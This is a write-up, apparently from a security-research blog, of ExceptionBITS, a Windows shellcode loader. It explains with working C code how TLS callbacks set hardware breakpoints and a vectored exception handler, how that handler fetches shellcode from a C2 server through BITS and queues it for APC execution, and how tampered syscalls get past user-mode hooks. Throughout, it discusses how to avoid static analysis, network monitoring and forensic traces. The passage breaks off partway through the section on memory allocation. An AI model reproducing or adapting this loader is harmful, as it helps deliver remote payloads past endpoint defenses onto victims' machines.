# ExceptionBITS

[ExceptionBITS](https://github.com/Swayampadhy/ExceptionBITS) is a hardware-breakpoint-based loader that uses TLS callbacks to set up hardware breakpoints and a Vectored Exception Handler (VEH) even before the main thread starts executing. The idea is to put the checkpoints on obscure memory locations or external functions in a benign-looking application. These so-called breakpoint "checkpoints", when hit, can lead the program to enter an "EXCEPTION\_SINGLE\_STEP" mode where the magic happens.

In this mode, the VEH controls the execution flow of the program. The main VEH then downloads the shellcode from a C2/remote server using the Windows Background Intelligent Transfer Service (BITS), stores the payload in mapped memory and finally executes it through an Asynchronous Procedure Call (APC).

To circumvent user-mode hooks, ExceptionBITS uses a technique similar to [syscalls tampering](https://github.com/rad9800/TamperingSyscalls) by **rad9800** and [Tampered Syscalls Via Hardware BreakPoints](https://maldevacademy.com/) by **Maldev-Academy**. Syscall tampering is implemented here as follows:

* First the VEH calculates the SSN for the required Zw\* "malicious" functions from ntdll.dll's export table and uses the sorted index as the SSN.
* The VEH then calls a benign NTAPI such as NtQuerySecurityObject with some function arguments.
* It then hooks onto that benign NTAPI by placing a hardware breakpoint at the start of the syscall stub.
* The CRITICAL\_SECTIONS are then synchronized to prevent race conditions.
* In the nested VEH for the "malicious" functions, the SSN of the benign function in the RAX register is replaced with the SSN of the "malicious" function.
* Finally the desired number of parameters are replaced and the function is executed.
* This is repeated for all the "malicious" functions.

***

## Overall Program Flowchart

<figure><img src="https://2429440930-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fvmiq90eCUf7ZZMUGm7Qu%2Fuploads%2FVZf9pseeQc94TdYnDE25%2Foffence_flowchart.png?alt=media&#x26;token=e558dfcd-b803-4493-aaa9-173576444eb6" alt=""><figcaption></figcaption></figure>

***

## Detailed Working Of ExceptionBITS

ExceptionBITS operates through four distinct stages:

**TLS initialization → Main execution → Payload delivery → Syscall tampering.**

We will go through the stages one by one in the expandable sections below.

<details>

<summary>TLS Initialization</summary>

#### 1.1 TLS Callback registration

{% code overflow="wrap" %}

```c
#pragma comment (linker, "/INCLUDE:_tls_used")
#ifdef _WIN64
#pragma comment (linker, "/INCLUDE:HWBPTlsCallback")
#else
#pragma comment (linker, "/INCLUDE:_HWBPTlsCallback")
#endif

#pragma const_seg(".CRT$XLB")
EXTERN_C CONST PIMAGE_TLS_CALLBACK HWBPTlsCallback = (PIMAGE_TLS_CALLBACK)HWBPTlsCallbackFunction;
#pragma const_seg()
```

{% endcode %}

* `#pragma comment (linker, "/INCLUDE:_tls_used")` forces the linker to include the `_tls_used` symbol, which tells Windows that this executable contains TLS data and callbacks.
* The `#ifdef _WIN64` block handles platform-specific symbol naming. On x86, symbols are prefixed with an underscore, so `_HWBPTlsCallback` is used instead of `HWBPTlsCallback`.
* `#pragma const_seg(".CRT$XLB")` places the next constant into a section contribution named `.CRT$XLB`. The `.CRT$XL*` group (`.CRT$XLA` through `.CRT$XLZ`) holds the array of TLS callback pointers.
* The callback pointer `HWBPTlsCallback` is assigned to point to `HWBPTlsCallbackFunction`, which will be called automatically by the Windows loader.

The `.CRT$XLB` placement matters because of how the callback array is built. The linker sorts the `.CRT$XL*` contributions alphabetically (XLA, XLB, XLC...) and merges them into a single array, whose start and end markers the CRT places in `.CRT$XLA` and `.CRT$XLZ`. The TLS directory pulled in by `_tls_used` points at that array, and the Windows loader calls every entry during process initialization, before the `main()` entry point executes. Placing the pointer in XLB therefore makes it one of the first callbacks to run. This gives ExceptionBITS a pre-execution window in which its code runs before anything in `main()`. Whether security monitoring is already fully active in that window depends on the product, since statically imported DLLs have already been loaded by the time TLS callbacks fire.

#### **1.2 TLS Callback Function Implementation**

{% code overflow="wrap" %}

```c
VOID NTAPI HWBPTlsCallbackFunction(PVOID hModule, DWORD dwReason, PVOID pContext) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        printf("[TLS][*] TLS Callback executed - Process attach\n");
        
        // Store the current thread ID
        tls_thread_id = GetCurrentThreadId();
        
        // Register primary Vectored Exception Handler
        veh_handle = AddVectoredExceptionHandler(1, VectoredHandler);
        if (!veh_handle) {
            printf("[TLS][!] Failed to add vectored exception handler\n");
            return;
        }
        
        // Set up hardware breakpoint context
        CONTEXT ctx = { 0 };
        ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
        HANDLE thread = GetCurrentThread();
        
        if (GetThreadContext(thread, &ctx)) {
            // Set Dr0 to point to DummyFunction
            #if defined(_WIN64)
            ctx.Dr0 = (DWORD64)&DummyFunction;
            #else
            ctx.Dr0 = (DWORD)&DummyFunction;
            #endif
            
            ctx.Dr7 = 0x00000001;  // Enable L0 bit for Dr0
            ctx.Dr6 = 0;           // Clear debug status register
            
            if (SetThreadContext(thread, &ctx)) {
                // Save context for later restoration
                saved_context = ctx;
                context_saved = TRUE;
            }
        }
    }
}
```

{% endcode %}

* `dwReason == DLL_PROCESS_ATTACH` checks if this callback is being invoked during process initialization. TLS callbacks receive the same reason codes as `DllMain` (DLL\_PROCESS\_ATTACH, DLL\_THREAD\_ATTACH, DLL\_THREAD\_DETACH, DLL\_PROCESS\_DETACH).
* `tls_thread_id = GetCurrentThreadId()` stores the main thread's ID, which will be used later to verify context restoration is happening on the same thread.
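* `AddVectoredExceptionHandler(1, VectoredHandler)` registers a Vectored Exception Handler (VEH). The first argument is an ordering flag rather than a numeric priority: a nonzero value inserts the handler at the front of the VEH list, while zero appends it to the end. VEHs are called before structured exception handlers (SEH) when exceptions occur.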
* `CONTEXT ctx = { 0 }` initializes a CONTEXT structure, which represents the CPU's register state for a thread.
* `ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS` specifies that we want to manipulate the debug registers (Dr0-Dr7).
* `GetThreadContext(thread, &ctx)` retrieves the current register state of the thread.
* `ctx.Dr0 = (DWORD64)&DummyFunction` sets the Dr0 debug register to the memory address of `DummyFunction`. Dr0-Dr3 are address registers that can hold breakpoint addresses.
* `ctx.Dr7 = 0x00000001` configures the Dr7 control register. The value `0x00000001` sets bit 0 (L0), which enables the breakpoint stored in Dr0 as a local (thread-specific) breakpoint.
* `ctx.Dr6 = 0` clears the Dr6 status register, which tracks which breakpoints have fired.
* `SetThreadContext(thread, &ctx)` applies the modified register state back to the thread, activating the hardware breakpoint.
* `saved_context = ctx` stores the entire context (including the breakpoint configuration) in a global variable for later restoration.

By setting only bit 0 (`0x00000001`) and leaving the R/W0 and LEN0 fields at zero, the loader creates an execution breakpoint on Dr0. When the CPU's instruction pointer reaches the address stored in Dr0, it raises a debug exception before executing the instruction, which Windows reports as `EXCEPTION_SINGLE_STEP`. This redirection is harder for security tools to trace than a traditional function call.

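The context is saved so that it can be reapplied later. Debug registers are per-thread state that Windows normally preserves across context switches, but Microsoft documents the result of calling `SetThreadContext` on a running thread as unpredictable, so the values written here are not guaranteed to stick. By saving the context, the loader can restore the breakpoint if it is no longer set when `main()` executes.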
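To make the Dr7 bit layout concrete, here is a minimal, portable sketch that unpacks one breakpoint slot from a Dr7 value. It is not part of ExceptionBITS; the `dr7_slot_t` type and `dr7_decode_slot` helper are hypothetical names introduced for illustration, and the field positions follow the architectural layout (enable bits in the low byte, R/W and LEN fields starting at bit 16).

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper type: decoded view of one Dr7 breakpoint slot (n = 0..3). */
typedef struct {
    int local_enabled;   /* Ln bit, at bit 2n */
    int global_enabled;  /* Gn bit, at bit 2n + 1 */
    unsigned rw;         /* R/Wn field: 0 = execute, 1 = write, 3 = read/write */
    unsigned len;        /* LENn field: 0 = 1 byte, 1 = 2 bytes, 3 = 4 bytes */
} dr7_slot_t;

/* Extract the enable bits and the R/W and LEN fields for slot n from a Dr7 value. */
dr7_slot_t dr7_decode_slot(uint64_t dr7, unsigned n) {
    dr7_slot_t s;
    assert(n < 4);  /* only Dr0..Dr3 hold breakpoint addresses */
    s.local_enabled  = (int)((dr7 >> (2 * n)) & 1u);
    s.global_enabled = (int)((dr7 >> (2 * n + 1)) & 1u);
    s.rw  = (unsigned)((dr7 >> (16 + 4 * n)) & 3u);
    s.len = (unsigned)((dr7 >> (18 + 4 * n)) & 3u);
    return s;
}
```

Decoding the value written by the TLS callback, `dr7_decode_slot(0x00000001, 0)`, gives L0 = 1, G0 = 0, R/W0 = 0 and LEN0 = 0: a locally enabled, one-byte execution breakpoint on the address in Dr0.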

#### Demo Target Function Call

```c
__declspec(noinline) void DummyFunction() {
    // Empty function that will trigger hardware breakpoint
}

typedef void (*pfunc_t)();
static pfunc_t volatile pDummy = DummyFunction;
```

* `__declspec(noinline)` is a compiler directive that prevents the optimizer from inlining this function. Inlining would eliminate the function's distinct address, which would break the hardware breakpoint targeting.
* The function body is intentionally empty because it only serves as a breakpoint target: the exception fires before its first instruction executes. This is for demo purposes; the target can be changed to any other external function or an obscure memory region.
* `typedef void (*pfunc_t)()` defines a function pointer type that points to functions taking no arguments and returning void.
* `static pfunc_t volatile pDummy = DummyFunction` creates a static, volatile function pointer. The `volatile` keyword prevents the compiler from optimizing away the indirection, ensuring the call goes through the pointer.

Using a function pointer instead of calling `DummyFunction()` can confuse static analysis tools. The `volatile` qualifier forces the compiler to generate actual memory access for the function pointer, preventing optimization that might make the call pattern obvious to signature-based detection.

</details>

<details>

<summary>Main Execution</summary>

#### **2.1 Context Restoration**

{% code overflow="wrap" %}

```c
BOOL RestoreSavedContext() {
    if (!context_saved) {
        printf("[!] No saved context available\n");
        return FALSE;
    }
    
    printf("[*] Restoring saved thread context from TLS callback\n");
    printf("[*] Current thread ID: %lu, TLS thread ID: %lu\n", 
           GetCurrentThreadId(), tls_thread_id);
    printf("[*] Restoring Dr0: 0x%p, Dr7: 0x%lx\n", 
           (void*)saved_context.Dr0, (unsigned long)saved_context.Dr7);
    
    HANDLE thread = GetCurrentThread();
    if (SetThreadContext(thread, &saved_context)) {
        printf("[*] Successfully restored thread context from TLS callback\n");
        return TRUE;
    }
    else {
        printf("[!] Failed to restore thread context, error: %lu\n", GetLastError());
        return FALSE;
    }
}
```

{% endcode %}

* `if (!context_saved)` checks if the TLS callback successfully saved a context. If not, there's nothing to restore.
* The function logs the current thread ID and the TLS thread ID to verify they match, ensuring we're restoring the context on the correct thread.
* `GetCurrentThread()` returns a pseudo-handle to the current thread. This is always `-2` and represents "the calling thread".
* `SetThreadContext(thread, &saved_context)` reapplies the entire saved context, including the Dr0, Dr6, and Dr7 registers, effectively reactivating the hardware breakpoint on `DummyFunction`.

This restoration step is a safeguard. The breakpoint was set from the TLS callback by calling `SetThreadContext` on the running thread, which Microsoft documents as unpredictable, so the debug registers may not hold the expected values by the time `main()` runs. By restoring the context at the beginning of `main()`, ExceptionBITS reapplies the hardware breakpoint immediately before `pDummy()` is called.

#### 2.2 Main Function Flow

```c
int main() {
    printf("[*] Main function started\n");
    printf("[*] Current thread ID: %lu\n", GetCurrentThreadId());
    
    // Verify VEH was set in TLS callback
    if (!veh_handle) {
        printf("[!] VEH was not set up in TLS callback!\n");
        return -1;
    }
    
    printf("[*] VEH handle from TLS: 0x%p\n", veh_handle);
    
    // Restore saved TLS thread context
    RestoreSavedContext();
    
    // Call the dummy function to trigger the breakpoint
    printf("[*] Calling DummyFunction to trigger hardware breakpoint\n");
    pDummy();
    
    printf("[*] Now executing the payload\n");
    
    // Enter alertable wait for APC execution with timeout
    DWORD start_time = GetTickCount();
    BOOL apc_executed = FALSE;
    
    // Wait in alertable state for APC to execute or timeout
    while (GetTickCount() - start_time < APC_TIMEOUT) {
        DWORD result = SleepEx(1000, TRUE);
        if (result == WAIT_IO_COMPLETION) {
            printf("[*] APC executed successfully\n");
            apc_executed = TRUE;
            break;
        }
    }
      
    // Cleanup
    if (veh_handle) {
        RemoveVectoredExceptionHandler(veh_handle);
        printf("[*] Vectored exception handler removed\n");
        veh_handle = NULL;
    }
    
    HaltHardwareBreakpointHooking();
    printf("[*] Program exiting cleanly\n");
    return 0;
}
```

* The function begins with verification that `veh_handle` is valid, confirming the TLS callback executed successfully.
* `RestoreSavedContext()` reactivates the hardware breakpoint that may have been cleared by Windows.
* `pDummy()` calls the function pointer pointing to `DummyFunction`. This is where execution hits the hardware breakpoint.
* When the breakpoint triggers, the CPU raises a debug exception before the first instruction of `DummyFunction` executes. Windows reports it as `EXCEPTION_SINGLE_STEP`, and control transfers to `VectoredHandler`.
* After `VectoredHandler` completes and returns `EXCEPTION_CONTINUE_EXECUTION`, execution resumes at the breakpoint address with the breakpoint cleared, so the empty `DummyFunction` runs and returns to the statement after `pDummy()`.
* `GetTickCount()` returns the number of milliseconds since system boot. This is used to implement a timeout mechanism.
* `SleepEx(1000, TRUE)` puts the thread to sleep for 1000ms (1 second), but with the second parameter `TRUE`, it enters an **alertable wait state**.
* In an alertable wait, the kernel can interrupt the sleep to deliver Asynchronous Procedure Calls (APCs) queued to this thread.
* `result == WAIT_IO_COMPLETION` indicates the sleep was interrupted by an APC. `WAIT_IO_COMPLETION` (value 0xC0) means an APC was delivered and executed.
* The loop continues until either an APC executes or 10 seconds (APC\_TIMEOUT) elapse, providing a timeout mechanism.
* `RemoveVectoredExceptionHandler(veh_handle)` unregisters the main VEH to clean up.
* `HaltHardwareBreakpointHooking()` removes the syscall tampering VEH and cleans up the critical section.

The `pDummy()` call triggers the entire payload delivery chain. The use of `SleepEx` with alertable wait is the correct way to allow APC execution in user mode. Regular `Sleep()` would not allow APCs to run. APCs are a kernel-level mechanism that allows one thread to queue a function to be executed by another thread, but they only execute when the target thread is in an alertable wait state (via functions like `SleepEx`, `WaitForSingleObjectEx`, etc.). The timeout mechanism prevents the program from hanging indefinitely if something goes wrong with the payload delivery.
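The timeout check in the loop relies on unsigned arithmetic: `GetTickCount()` returns a 32-bit millisecond counter that wraps roughly every 49.7 days, and subtracting the start value still yields the correct elapsed time across a wrap. The portable sketch below illustrates only that arithmetic; `ticks_elapsed`, `timed_out` and `ticks_example` are hypothetical helper names, not functions from the loader.

```c
#include <assert.h>
#include <stdint.h>

/* Milliseconds elapsed between two 32-bit tick readings.
 * Unsigned subtraction wraps modulo 2^32, so the result stays
 * correct even if the counter rolled over between the readings. */
uint32_t ticks_elapsed(uint32_t start, uint32_t now) {
    return (uint32_t)(now - start);
}

/* Mirrors the loop condition: keep waiting while elapsed < timeout. */
int timed_out(uint32_t start, uint32_t now, uint32_t timeout_ms) {
    return ticks_elapsed(start, now) >= timeout_ms;
}

/* Usage example: a start reading taken 0x100 ms before the counter wraps. */
void ticks_example(void) {
    assert(ticks_elapsed(0xFFFFFF00u, 0x00000100u) == 0x200u);
    assert(!timed_out(0u, 9999u, 10000u));
    assert(timed_out(0u, 10000u, 10000u));
}
```

Comparing the two readings directly (for example `now >= start + timeout`) would misbehave near the wrap point, which is why the subtraction form used in `main()` is the safer pattern.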

</details>

<details>

<summary>Payload Delivery</summary>

#### **3.1 Exception Filtering and Breakpoint Clearing**

{% code overflow="wrap" %}

```c
LONG WINAPI VectoredHandler(EXCEPTION_POINTERS* ExceptionInfo) {
    static BOOL main_processing = FALSE;
    printf("[*] VectoredHandler called - Exception Code: 0x%08lX\n", 
           ExceptionInfo->ExceptionRecord->ExceptionCode);
    
    // Check if this is a single-step exception (hardware breakpoint)
    if (ExceptionInfo->ExceptionRecord->ExceptionCode != EXCEPTION_SINGLE_STEP) 
    {
        return EXCEPTION_CONTINUE_SEARCH;
    }
    
    if (shellcode_executed) {
        return EXCEPTION_CONTINUE_SEARCH;
    }
    
    if (main_processing) {
        return EXCEPTION_CONTINUE_SEARCH;
    }
    
    // This is the initial breakpoint on DummyFunction
    printf("[*] Single step exception caught - Address: 0x%p\n", 
           ExceptionInfo->ExceptionRecord->ExceptionAddress);
    printf("[*] Expected breakpoint address: 0x%p\n", (PVOID)DummyFunction);
    
    main_processing = TRUE;
    
    // Save thread context for restoration in main thread
    CONTEXT ctx = { 0 };
    ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
    HANDLE thread = GetCurrentThread();
    
    // Clear the hardware breakpoint on DummyFunction
    if (GetThreadContext(thread, &ctx)) {
        printf("[*] Clearing hardware breakpoint on DummyFunction\n");
        ctx.Dr0 = 0;
        ctx.Dr6 = 0;
        ctx.Dr7 = 0;
        SetThreadContext(thread, &ctx);
    }
```

{% endcode %}

* `EXCEPTION_POINTERS* ExceptionInfo` is a structure containing two nested structures: `ExceptionRecord` (details about the exception) and `ContextRecord` (CPU register state when the exception occurred).
* `static BOOL main_processing = FALSE` is a static variable (persistent across function calls) used as a reentry guard. Once set to TRUE, subsequent calls to this handler during the same execution will immediately return.
* `ExceptionInfo->ExceptionRecord->ExceptionCode != EXCEPTION_SINGLE_STEP` checks if the exception is the expected type. `EXCEPTION_SINGLE_STEP` (0x80000004) is generated by hardware breakpoints and the trap flag. If it's a different exception type, this handler isn't interested, so it returns `EXCEPTION_CONTINUE_SEARCH` to let other handlers process it.
* `if (shellcode_executed)` and `if (main_processing)` are checks to prevent reentry. Once the main work is done (`main_processing = TRUE`) or shellcode is running (`shellcode_executed = TRUE`), this handler steps aside and lets the syscall tampering handler deal with any further exceptions.
* `ExceptionInfo->ExceptionRecord->ExceptionAddress` contains the instruction pointer (RIP/EIP) where the exception occurred. Logging this confirms it matches `DummyFunction`'s address.
* `ctx.Dr0 = 0; ctx.Dr6 = 0; ctx.Dr7 = 0` clears all debug registers, disabling the hardware breakpoint on `DummyFunction`. This is critical because otherwise, returning `EXCEPTION_CONTINUE_EXECUTION` would cause the breakpoint to trigger again immediately, creating an infinite loop.

The reentry guards (`main_processing` and `shellcode_executed`) are essential because this is a global exception handler that will be called for EVERY `SINGLE_STEP` exception in the process. Once the main payload delivery logic runs, we don't want it to run again. The syscall tampering mechanism will generate many `SINGLE_STEP` exceptions (one for each tampered syscall), and those need to be handled by the dedicated syscall tampering VEH, not this handler. That VEH is registered with a first argument of 0, which under `AddVectoredExceptionHandler` semantics places it after this handler in the call order, so it only sees an exception once this handler has declined it. By returning `EXCEPTION_CONTINUE_SEARCH` when appropriate, this handler cooperates with the other VEH in a multi-handler architecture.

#### **3.2 Hash Calculation and Syscall Infrastructure**

```c
    // Calculate syscall hashes
    g_ZwCreateSection_Hash = CALC_HASH("ZwCreateSection");
    g_ZwMapViewOfSection_Hash = CALC_HASH("ZwMapViewOfSection");
    g_ZwQueueApcThread_Hash = CALC_HASH("ZwQueueApcThread");
    
    printf("[*] Calculated hashes:\n");
    printf("    ZwCreateSection: 0x%0.8X\n", g_ZwCreateSection_Hash);
    printf("    ZwMapViewOfSection: 0x%0.8X\n", g_ZwMapViewOfSection_Hash);
    printf("    ZwQueueApcThread: 0x%0.8X\n", g_ZwQueueApcThread_Hash);
    fflush(stdout);
    
    // Initialize tampered syscall hooking
    printf("[*] Initializing tampered syscall hooking\n");
    if (!InitHardwareBreakpointHooking()) {
        printf("[!] Failed to initialize tampered syscall hooking\n");
        main_processing = FALSE;
        shellcode_executed = FALSE;
        return EXCEPTION_CONTINUE_EXECUTION;
    }
```

* `CALC_HASH("ZwCreateSection")` is a macro that expands to `CRC32BA("ZwCreateSection")`, which computes a 32-bit CRC32 hash of the function name string.
* The three hash calculations produce unique identifiers for the NT functions needed: `ZwCreateSection` (creates a memory section object), `ZwMapViewOfSection` (maps the section into the process's address space), and `ZwQueueApcThread` (queues an APC for execution).
* Global variables `g_ZwCreateSection_Hash`, `g_ZwMapViewOfSection_Hash`, and `g_ZwQueueApcThread_Hash` store these hashes for later use by the `TAMPER_SYSCALL` macro.
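* `InitHardwareBreakpointHooking()` is a function that registers a second VEH specifically for intercepting the tampered syscalls. This VEH is registered with a first argument of 0. Under `AddVectoredExceptionHandler` semantics that appends it to the end of the handler list, so it is called after the main VEH (registered with 1) has returned `EXCEPTION_CONTINUE_SEARCH`.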
* If initialization fails, the function resets the flags and returns `EXCEPTION_CONTINUE_EXECUTION` to allow the program to continue (though it won't function correctly).
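For readers unfamiliar with CRC32-based name hashing, the sketch below shows the standard reflected CRC-32 (polynomial `0xEDB88320`, initial value and final XOR of `0xFFFFFFFF`) computed bit by bit. This is an assumption about the general shape of such a hash: the loader's `CRC32BA` may use a different seed or variant, so its output is not guaranteed to match. The names `crc32_bytes` and `crc32_str` are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Standard reflected CRC-32, computed one bit at a time (no lookup table). */
uint32_t crc32_bytes(const void *data, size_t len) {
    const uint8_t *p = (const uint8_t *)data;
    uint32_t crc = 0xFFFFFFFFu;               /* initial value */
    for (size_t i = 0; i < len; i++) {
        crc ^= p[i];
        for (int bit = 0; bit < 8; bit++) {
            /* mask is all ones when the low bit is set, zero otherwise */
            uint32_t mask = 0u - (crc & 1u);
            crc = (crc >> 1) ^ (0xEDB88320u & mask);
        }
    }
    return ~crc;                              /* final XOR */
}

/* Convenience wrapper for NUL-terminated names (terminator not hashed). */
uint32_t crc32_str(const char *s) {
    assert(s != NULL);
    return crc32_bytes(s, strlen(s));
}
```

With this standard variant, `crc32_str("123456789")` evaluates to `0xCBF43926`, the usual CRC-32 check value, which is a convenient way to confirm an implementation before relying on its hashes.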

#### **3.3 BITS-Based Shellcode Download**

{% code overflow="wrap" %}

```c
DWORD DownloadShellcode(const char* url, char* buffer, DWORD maxSize) {
    HRESULT hr;
    IBackgroundCopyManager* pManager = NULL;
    IBackgroundCopyJob* pJob = NULL;
    GUID jobId;
    BG_JOB_STATE state;
    WCHAR* wUrl = NULL;
    WCHAR* wTempPath = NULL;
    char tempPath[MAX_PATH] = { 0 };
    DWORD bytesRead = 0;
    HANDLE hFile = INVALID_HANDLE_VALUE;
    
    printf("[*] Starting BITS download from %s\n", url);
    
    // Initialize COM
    hr = CoInitializeEx(NULL, COINIT_MULTITHREADED);
    if (FAILED(hr)) {
        printf("[!] CoInitializeEx failed, HRESULT=0x%08lx\n", (unsigned long)hr);
        return 0;
    }
    
    // Create temporary file path
    GetTempPathA(MAX_PATH, tempPath);
    strcat_s(tempPath, MAX_PATH, "shellcode.tmp");
    
    // Create BITS manager
    hr = CoCreateInstance(&CLSID_BackgroundCopyManager, NULL, CLSCTX_ALL, 
                          &IID_IBackgroundCopyManager, (void**)&pManager);
    if (FAILED(hr)) {
        printf("[!] CoCreateInstance failed, HRESULT=0x%08lx\n", (unsigned long)hr);
        goto cleanup;
    }
    
    // Create BITS job
    hr = pManager->lpVtbl->CreateJob(pManager, L"HWBP_Download", BG_JOB_TYPE_DOWNLOAD, &jobId, &pJob);
    if (FAILED(hr)) {
        printf("[!] CreateJob failed, HRESULT=0x%08lx\n", (unsigned long)hr);
        goto cleanup;
    }
```

{% endcode %}

* `IBackgroundCopyManager* pManager = NULL` declares a pointer to the BITS manager interface. BITS (Background Intelligent Transfer Service) is a Windows component designed for reliable background file transfers.
* `HRESULT hr` stores return values from COM methods. COM uses `HRESULT` values where negative numbers (< 0) indicate failure, and non-negative numbers indicate success.
* `CoInitializeEx(NULL, COINIT_MULTITHREADED)` initializes the COM library for multi-threaded apartment model. This is required before using any COM interfaces.
* `FAILED(hr)` is a macro that checks if `hr < 0`, indicating a COM error.
* `GetTempPathA(MAX_PATH, tempPath)` retrieves the path to the current user's temporary directory (typically `C:\Users\<username>\AppData\Local\Temp\`).
* `strcat_s(tempPath, MAX_PATH, "shellcode.tmp")` appends "shellcode.tmp" to the temp path, creating a full file path for the download destination.
* `CoCreateInstance(&CLSID_BackgroundCopyManager, ...)` creates an instance of the BITS Background Copy Manager COM object. The `CLSID_BackgroundCopyManager` is the unique identifier `{4991d34b-80a1-4291-83b6-3328366b9097}`.
* `pManager->lpVtbl->CreateJob(...)` creates a new BITS job named "HWBP\_Download" of type `BG_JOB_TYPE_DOWNLOAD` (value 0). BITS jobs can be downloads, uploads, or upload-replies.
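The `HRESULT` convention described above can be illustrated without any Windows headers. The sketch below uses a stand-in type and macros (`hresult_t`, `HR_SUCCEEDED`, `HR_FAILED`, `hr_severity`, `hr_code` are all hypothetical names mirroring the SDK's `HRESULT`, `SUCCEEDED` and `FAILED`); it assumes the usual two's-complement conversion when casting an unsigned constant to a signed 32-bit value.

```c
#include <assert.h>
#include <stdint.h>

typedef int32_t hresult_t;  /* stand-in for the SDK's HRESULT */

/* Success is "non-negative", failure is "negative", as with SUCCEEDED/FAILED. */
#define HR_SUCCEEDED(hr) (((hresult_t)(hr)) >= 0)
#define HR_FAILED(hr)    (((hresult_t)(hr)) < 0)

/* The top bit is the severity flag (1 = failure). */
unsigned hr_severity(hresult_t hr) { return (unsigned)(((uint32_t)hr >> 31) & 0x1u); }

/* The low 16 bits carry the error code. */
unsigned hr_code(hresult_t hr) { return (unsigned)((uint32_t)hr & 0xFFFFu); }

/* Usage example with well-known values: S_OK (0), S_FALSE (1), E_FAIL (0x80004005). */
void hr_example(void) {
    assert(HR_SUCCEEDED(0));
    assert(HR_SUCCEEDED(1));
    assert(HR_FAILED((hresult_t)0x80004005u));
    assert(hr_code((hresult_t)0x80004005u) == 0x4005u);
}
```

Note that `S_FALSE` (1) counts as success, so testing `hr == 0` is not equivalent to checking for success; this is why the download code tests `FAILED(hr)` rather than comparing against `S_OK`.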

{% code overflow="wrap" %}

```c
    // Convert URL and temp path to wide strings
    int urlLen = MultiByteToWideChar(CP_UTF8, 0, url, -1, NULL, 0);
    wUrl = (WCHAR*)malloc(urlLen * sizeof(WCHAR));
    if (!wUrl) goto cleanup;
    MultiByteToWideChar(CP_UTF8, 0, url, -1, wUrl, urlLen);
    
    int tempLen = MultiByteToWideChar(CP_UTF8, 0, tempPath, -1, NULL, 0);
    wTempPath = (WCHAR*)malloc(tempLen * sizeof(WCHAR));
    if (!wTempPath) goto cleanup;
    MultiByteToWideChar(CP_UTF8, 0, tempPath, -1, wTempPath, tempLen);
    
    // Add file to job
    hr = pJob->lpVtbl->AddFile(pJob, wUrl, wTempPath);
    if (FAILED(hr)) {
        printf("[!] AddFile failed, HRESULT=0x%08lx\n", (unsigned long)hr);
        goto cleanup;
    }
    
    // Resume job
    hr = pJob->lpVtbl->Resume(pJob);
    if (FAILED(hr)) {
        printf("[!] Resume failed, HRESULT=0x%08lx\n", (unsigned long)hr);
        goto cleanup;
    }
    
    // Poll job state until completion or error
    do {
        Sleep(300);
        hr = pJob->lpVtbl->GetState(pJob, &state);
        if (FAILED(hr)) goto cleanup;
    } while (state != BG_JOB_STATE_ERROR && state != BG_JOB_STATE_TRANSFERRED);
    
    if (state == BG_JOB_STATE_ERROR) {
        printf("[!] BITS job failed\n");
        goto cleanup;
    }
    
    // Complete the job
    hr = pJob->lpVtbl->Complete(pJob);
    if (FAILED(hr)) goto cleanup;
    
    // Read downloaded file
    hFile = CreateFileA(tempPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) goto cleanup;
    
    DWORD fileSize = GetFileSize(hFile, NULL);
    if (fileSize == INVALID_FILE_SIZE || fileSize > maxSize) goto cleanup;
    
    if (!ReadFile(hFile, buffer, fileSize, &bytesRead, NULL)) {
        bytesRead = 0;
    }
    
cleanup:
    if (hFile != INVALID_HANDLE_VALUE) {
        CloseHandle(hFile);
        DeleteFileA(tempPath);
    }
    if (wUrl) free(wUrl);
    if (wTempPath) free(wTempPath);
    if (pJob) pJob->lpVtbl->Release(pJob);
    if (pManager) pManager->lpVtbl->Release(pManager);
    CoUninitialize();
    
    return bytesRead;
}
```

{% endcode %}

* `MultiByteToWideChar(CP_UTF8, 0, url, -1, NULL, 0)` calculates the number of wide characters needed to represent the UTF-8 URL string. Calling it with `NULL` and `0` for the output parameters makes it return the required buffer size.
* `malloc(urlLen * sizeof(WCHAR))` allocates memory for the wide character string. `WCHAR` is typically 2 bytes.
* The second `MultiByteToWideChar` call actually performs the conversion from multi-byte (UTF-8) to wide character (UTF-16), which BITS requires.
* `pJob->lpVtbl->AddFile(pJob, wUrl, wTempPath)` adds a file transfer to the job, specifying the remote URL and local destination path.
* `pJob->lpVtbl->Resume(pJob)` starts the download. BITS jobs are created in a suspended state and must be explicitly resumed.
* The `do-while` loop polls the job state every 300ms. `GetState` returns values like `BG_JOB_STATE_QUEUED` (0), `BG_JOB_STATE_CONNECTING` (1), `BG_JOB_STATE_TRANSFERRING` (2), `BG_JOB_STATE_ERROR` (4), or `BG_JOB_STATE_TRANSFERRED` (6).
* `pJob->lpVtbl->Complete(pJob)` finalizes the job, moving the temporary file to its final destination. BITS downloads to a temporary location first.
* `CreateFileA` opens the downloaded file with `GENERIC_READ` access.
* `GetFileSize` retrieves the file size. The validation `fileSize > maxSize` prevents buffer overflows.
* `ReadFile` reads the entire file content into the provided buffer.
* The `cleanup` section uses `goto` for error handling, ensuring COM objects are released and memory is freed regardless of how the function exits. The temporary file is deleted whenever it was successfully opened.

BITS is used for the download for several reasons:

* BITS is a legitimate Windows service used by Windows Update, Microsoft Store, and many enterprise applications, so BITS traffic is common and expected, and network monitoring is less likely to flag it as suspicious.
* BITS handles network interruptions gracefully: if the connection drops, it automatically resumes when connectivity returns, making the download highly reliable.
* BITS respects network throttling policies and uses idle bandwidth, making it less likely to trigger network anomaly detection based on bandwidth usage patterns.
* BITS jobs persist across reboots, i.e. if the system restarts during the download, BITS resumes automatically.

However, this persistence also means forensic investigators could find evidence of the BITS job in Windows event logs and BITS database files, which is why the function completes the job and deletes the downloaded file as soon as it has been read.

The conversion to wide character strings is necessary because BITS's COM interface expects UTF-16 strings (Windows's internal Unicode format). The polling loop could be replaced with BITS's callback mechanism for efficiency, but polling is simpler and avoids registering additional COM callbacks that might leave forensic artifacts. The immediate deletion of the temporary file after reading it into memory minimizes the window during which the shellcode exists on disk. In a more sophisticated version, the downloaded file could be encrypted and decrypted in memory only, never touching disk in decrypted form.

#### **3.4 Memory Allocation via Tampered Syscalls**

{% code overflow="wrap" %}
